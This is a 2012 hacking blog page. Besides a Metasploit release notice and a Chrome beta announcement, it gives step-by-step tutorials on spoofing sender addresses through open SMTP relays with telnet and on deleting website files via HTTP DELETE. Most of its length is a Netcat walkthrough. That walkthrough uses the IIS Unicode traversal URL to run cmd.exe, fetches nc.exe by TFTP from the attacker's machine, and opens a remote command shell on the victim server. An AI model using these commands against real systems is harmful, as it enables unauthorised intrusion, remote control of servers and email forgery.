Wednesday, 8 August 2012

Download free Metasploit framework 3.7.2

Metasploit framework 3.7.2 

Now you can download Metasploit Framework 3.7.2 free  including more then 698 exploit modules, 358 auxiliary modules, and 54 post modules, 11 new exploits, 1 new auxiliary module, and 15 new post modules.Latest version solves several issues with updating the framework, adds 11 exploit / auxiliary modules and brings a plethora of new features among us.

New Exploit Modules since 3.7.1

  • MS11-050 IE mshtml!CObjectElement Use After Free
  • AWStats Totals =< v1.14 multisort Remote Command Execution
  • IBM Tivoli Endpoint Manager POST Query Buffer Overflow
  • Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
  • Magix Musik Maker 16 .mmm Stack Buffer Overflow
  • GoldenFTP PASS Stack Buffer Overflow
  • VisiWave VWR File Parsing Vulnerability
  • DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
  • 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow
  • 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
  • 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities

                                                       DOWNLOAD METASPLOIT HERE

Tuesday, 7 August 2012

Download Google Chrome 21.0.1180.64 Beta

Google Chrome 21.0.1180.64 Beta

      
Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier.
One box for everything
Type in the address bar and get suggestions for both search and web pages.
Thumbnails of your top sites
Access your favorite pages instantly with lightning speed from any new tab.
Incognito mode
Don't want pages you visit to show up in your web history? Choose incognito mode for private browsing.
Safe browsing
Google Chrome warns you if you're about to visit a suspected phishing, malware or otherwise unsafe website.
For information about alpha and developer builds, check out the Chrome dev channel here.

How to use Telnet

           Most of you only know that telnet is a Port [Port 23] or that telnet is a remote control tool, remote control means in this aspect that you as client can get a connection to for example a telnet server and then you can write commands in a derivate of a shell and these commands are executed only on this server not on your machine

 How To Use Telnet

Telnet is a text based tool, so if you want to connect to the destination [128.62.254.12] write: 'telnet 128.62.254.12 23', so you see at first there is the command telnet to start the telnet client, the next is the destination address and last is the port, you know the telnet port 23, so i hope now you can use telnet

 How To Send Anonymous Mails

3-1 - SMTP

Yes first i have to say somehting about the smtp [simple mail transfer protocol], the standard is written down in the rfc 821 [rfc = request for comments] it goes back to the year 1982, this rfc defines the commands which could be used These commands :

1 - HELO [client adress or name], it marks the begin of that telnet session and sends your name or address to the smtp server

2 - MAIL FROM [your mail addie], with this command you send your mail addie to server is also written in the e-mail as sender

3 - RCPT TO [recipient], with this command you define the recipient

4 - DATA, this marks the begnning of the e-mail if the server sends an ack [ackwoledge] you can begin to write the message

5 - RSET, reset this establishs the initial stage and the connection is canceled

6 - NOOP, no operation so it means that nothing is done

7 - QUIT, this is the ending of the smtp connection

But this are only the most important commands many commands have been added in this time after the rfc has defined them

EXPN, expand with this command maillist support will be available
VRFY, verify this command requests the confirmation of the recipient address
Caused of this addition them smtp is also called esmtp which means Extended smtp

3-2 How To Use SMTP To Send Anonymous Mails

First you have to find a free accessable smtp server, caused by spaming many servers has secured their systems like gmx with [smtp after pop] which means that at first you have to login at pop with your username and password for your gmx e-mail addie, after that the srever saves your ip for a special time in which you can connect to smtp server to send mails, freenet uses another secured system, this smtp server denies special recepient addies, so you have to search a free accessable mail server with out such secured servers, they exists, so after you have found such a server you can write in your shell : [telnet <serveraddy> 25] then your client connects to it, here is a complete telnet session :

Connected to mail.gmx.net.
220 {mp015-rz3} GMX Mailservices ESMTP
HELO www.The-Netrix.net
250 {mp015-rz3} GMX Mailservices
MAIL FROM:LinusTorvalds@linux.org
250  ... Sender Okay
RCPT TO:BillGates@microsoft.com
250  ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
Operating Systems are like sex, you have the best if it is free
.
250 Mail accepted
QUIT
221 mail.gmx.net closing connection
Connection closed by foreign host.

First your client trys to connect to the mail server, as sign that the connection is established the server answers with a command like that, then you say hello to the server with the command [HELO] and your machines name, next is another answer from server which is unimportant, after it you send your mail addy to server with the command [MAIL FROM:] followed by your addy, then the server check this addy and if it's ok he will inform you about it, next he expects the recipient and you won't let him wait with the command [RCPT TO:] followed by the addy of the recipient, if it's also ok you can start to write your mail after the command [DATA] which is followed by the ack of the server and the text or character which marks the end of the mail, then you write your mail
and end it how the server expect it, if the mail is ok the server will inform you for the last time in this session, after it there is no cause which should hold your connection so you will end it with [QUIT] and the server will send a last stupid message as sign that the connection is closed

4 - How To Use Telnet In Several Ways

4-1 - How To Delete Files Of A Website

There is a way to delete files of a website with the help of the http [hyper text transfer protocol] but this security hole is mostely
closed, this hole is caused by stupid administrators which can't configure there apache or iis or any other http server

4-1-1 - HTTP

The http exists since 1990, before this time the internet was used to make a file exchange with the ftp or to get in mailboxes where you can write messages or many other things, with the http and html [hyper text mark language] the www_clients like netscape or ie can interprete this hyper text to display informations or other things like you know, but what the user can't see when he uses such a client that the http follows also the request_answer_play, the client requests informations with a special command, which i will explain beside others later, and the http server answers with the requested informations, this requests or answers are http messages which could be simple_request or simple_response or full_request or full_response, the simple http_messages based on http/0.9 and the full messages on http/1.0, but the difference between this messages is very small, except the one of html/0.9 and html/1.0

1 - get [address], the address is the whole like http://www.destination.com/index.html this command requests the informations [the code] in this file and if the file is a cgi it have to be executed and the produced informations will be send to client the difference between this simple_request and the full_request is that the full_request ends with http/1.0 like this : [get http://www.destination.com/index.html http/1.0]

2 - head [addy], it have to be a complete addy too, the small difference between this command and the get command is that this command only meta_tags and the other informations in the title tag

3 - post [addy], this is used for bigger data it is mostley used for data which have to be send to a program

4 - put [addy], with put you send data to the server like html documents and this data is saved under the addy

5 - delete [addy], this is the opposite of put so it deletes the data which you have specified with the addy

4-1 - How To Delete Files Of A Website

With your instinct you have discovered that there is a security hole, the http protocol today is used in combinition with the ftp, so that means ftp is used by webmasters to upload their files and http is used by the client to resolve these site, but in former times concrete, at the development of the http the developers aimed to make it easier to upload files, so not with the ftp and that means without a special ftp-client, so they created a command to upload and delete files on a webserver, but the problem is that the http didn't use an authentication but ftp does, so that means that the most administrators disabled these commands to shut a security hole, but there are not only experienced admins out there but stupid too, so there is still such a hole which waits to be used, how ever telnet is an excellent simple tool, so if you want to use this security hole connect to the destination hostname or ip [you can use a hostname because dns will be used to resolve the ip] on port 80, i have showed you guys how to do it, when the connection is established you can use the commands which are discribed in section 4-1-1

How to Hack With Netcat

NetCat :- Netcat is a utility  to write and read data in TCP and UDP network
connections. If you are responsible for network or system security it essential that you
understand the capabilities of Netcat. It can be used as port scanner, a backdoor,
a port redirector, a port listener and lots of other cool things . It's not always the
best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺
During this tutorial I'll demonstrate a complete hack, using Netcat only, just to point
out how versatile it is.

Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try
connecting to every port between 20 and 30 [inclusive] at the target, and will likely
inform you about an FTP server, telnet server, and mailer along the way. The -z
switch prevents sending any data to a TCP connection and very limited probe data to
a UDP connection, and is thus useful as a fast scanning mode just to see what ports
the target is listening on. To limit scanning speed if desired, -i will insert a delay
between each port probe. Even though Netcat can be used for port scanning it isn’t its
strength. A tool such as Nmap is better suited for port scanning.

We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and
25 are open

Banner Grabbing with Netcat

So if you are interested in knowing what's running behind port 80 and 21. Then use
Netcat to grab port banners in the this way:
 

   

So by this we know it’s probably a Windows 2000 machine as it's running IIS 5.0 and
Microsoft FTP Service.
Let's try to send a malformed URL which attempts to exploit the File Traversal
vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for
the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server
and demonstrate how we can use Netcat as a backdoor.
If you do not know what the Unicode File traversal exploit is, you can check the "IIS
Unicode File Traversal" tutorial, or read it up on the net.

Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and
execute programs anywhere on the attacked machine.
The point here isn't hacking IIS, but the use of Netcat as a backdoor. Don't get
distracted by the whole "hacking into IIS" thing.

  

URL has been send:
http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the
vulnerable IIS server and what we see is a directory listing of the IIS server C drive.
Now we have to upload Netcat to the IIS server, so we'll use TFTP and
integrate the TFTP commands into the malformed URL.

 
tftp –I 192.168.1.9 GET nc.exe
Is transformed to:
http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe
file:

 

Netcat as a BackDoor

 Netcat is uploaded to the IIS server, Now try to create a backdoor, in order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS
server (lets choose port 10001) and then we can connect to this port from our
attacking machine…using Netcat of course!
The command we want to give on the server looks like this:
nc -L -p 10001 -d -e cmd.exe

Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)
If we now want to convert this command for Unicode URL use, it will look like this:
http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe
Now we will execute Netcat on the remote IIS machine:
 
This should have started Netcat listening on port 10001 on the IIS machine and should
connect the cmd.exe process to the connection stream. From our machine we will try
to connect to the Netcat on the IIS server.
 
 Now we have "Shoveled a Shell" using Netcat. We effectively have a remote
command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file
called hack.txt to the IIS server, and for some reason we don't want to TFTP the file.
We can use Netcat to transfer files from one system to another.
To receive a file named hack.txt on the destination system start Netcat on the IIS
server with the following command:
nc –l –p 1234 >hack.txt

 
On our source system (the attacking computer) we send a file named hack.txt to the
IIS machine with the following command:
nc destination 1234 <hack.txt

 

Issue a ^C on the source system and your done. Be sure to check the file to be sure it
is the same size as the original.
This is what hack.txt looks like


 
And done.

 

The file hack.txt has been transferred to the target system, via port
1234.